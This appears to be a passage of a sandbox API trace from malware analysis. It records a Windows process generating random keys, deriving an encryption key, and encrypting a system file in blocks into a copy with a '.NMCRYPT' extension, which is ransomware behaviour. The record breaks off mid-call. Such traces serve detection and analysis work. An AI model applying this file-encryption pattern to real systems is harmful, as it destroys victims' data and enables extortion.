pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.133] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.133] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.134] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0167.134] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.134] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2b8) returned 1 [0167.134] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.134] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.134] wcslen (_String="\\\\?\\") returned 0x4 [0167.134] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad8b8) returned 1 [0167.134] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.134] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.135] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=54272) returned 1 [0167.135] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.136] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.202] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.202] GetLastError () returned 0x0 [0167.202] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.224] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.224] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.224] GetLastError () returned 0x0 [0167.224] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.224] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.225] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.225] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.225] GetLastError () returned 0x0 [0167.225] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 